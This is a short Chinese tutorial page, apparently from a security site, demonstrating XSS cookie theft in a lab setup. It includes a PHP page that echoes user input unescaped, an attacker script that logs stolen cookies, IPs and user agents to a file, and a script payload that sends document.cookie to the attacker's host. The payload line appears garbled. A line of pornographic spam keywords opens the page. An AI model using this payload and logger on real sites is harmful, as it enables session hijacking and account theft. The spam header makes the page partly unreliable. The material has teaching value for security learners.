偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

利用xss盜取cookie的簡單實(shí)例

安全 應(yīng)用安全
本文為利用xss盜取cookie的一個簡單實(shí)例。

試驗(yàn)環(huán)境:

攻擊機(jī)器  10.1.36.181 stealcookies.php cookie.txt

受害服務(wù)器 10.1.36.34 victim.php victim.html

(1)受害者有xss漏洞的腳本victim.php (問題字段用紅色標(biāo)明)

php

session_start();

session_regenerate_id();

echo session_id()."

";

if(isset($_POST["login"]))

{

echo "Hello " .$_POST["name"]."

";

}

?>

(2)對應(yīng)表單victim.html

id ="form1" name="form1" method="post" action="victim.php">

Name

name="name" type="text" id="name"/>

name="login" type="submit" id="login" value="submit"/>

正常流程:

簡單的利用xss盜取cookie實(shí)例 - 碳基體 - 碳基體

簡單的利用xss盜取cookie實(shí)例 - 碳基體 - 碳基體

(3)攻擊者盜取cookie的腳本stealcookies.php

php

$ua = $_SERVER["HTTP_USER_AGENT"];

$client_ip = $_SERVER["REMOTE_ADDR"];

$method = $_SERVER["REQUEST_METHOD"];

$referer = $_SERVER["HTTP_REFERER"];

$date = date("F j, Y, g:i a");

$querystring = $_SERVER["QUERY_STRING"];

$log = fopen("cookie.txt","a+");

$str= "IP: $client_ip |Useragent: $ua | Method: $method | REF: $referer | Date: $date | Cookie: $querystring \n";

fwrite($log,$str);

?>

腳本運(yùn)行的前提條件,在stealcookies.php同一根目錄下,有一個有寫權(quán)限的文件cookie.txt

攻擊流程:

在 http://10.1.36.34/victim.html的表單中提交以下語句

<script>document.write(' + encodeURI(document.cookie) + '"/>')</script>

js的意思是生成一個包含攻擊者url的圖片

簡單的利用xss盜取cookie實(shí)例 - 碳基體 - 碳基體

接著我們可以看到訪問該頁面用戶的cookie寫入到了攻擊者的cookie.txt文件里

查看攻擊者10.1.36.181上的cookie.txt文件

cat cookie.txt

可以看到收到cookie了。

責(zé)任編輯:藍(lán)雨淚 來源: 紅黑聯(lián)盟
相關(guān)推薦

2015-08-21 17:02:08

2009-02-23 14:53:24

2016-09-29 14:03:06

2013-11-08 11:15:54

2014-06-11 14:10:45

2018-04-18 07:34:58

2012-08-17 10:54:26

黑客網(wǎng)路安全穆雷

2016-02-15 10:18:11

2020-10-15 10:31:33

利用Prototype

2021-07-02 13:59:13

漏洞Xbox禮品卡微軟

2013-05-03 13:22:40

2013-04-07 10:11:27

2009-09-24 10:06:42

Hibernate實(shí)例

2022-02-15 13:50:31

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2009-07-18 13:26:48

2021-09-26 05:32:58

漏洞OperaXSS

2009-08-26 14:31:08

C#打印文件

2021-06-03 10:15:26

數(shù)據(jù)泄露網(wǎng)絡(luò)攻擊信息安全

2023-09-08 08:00:00

人工智能

2019-02-24 22:37:00

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號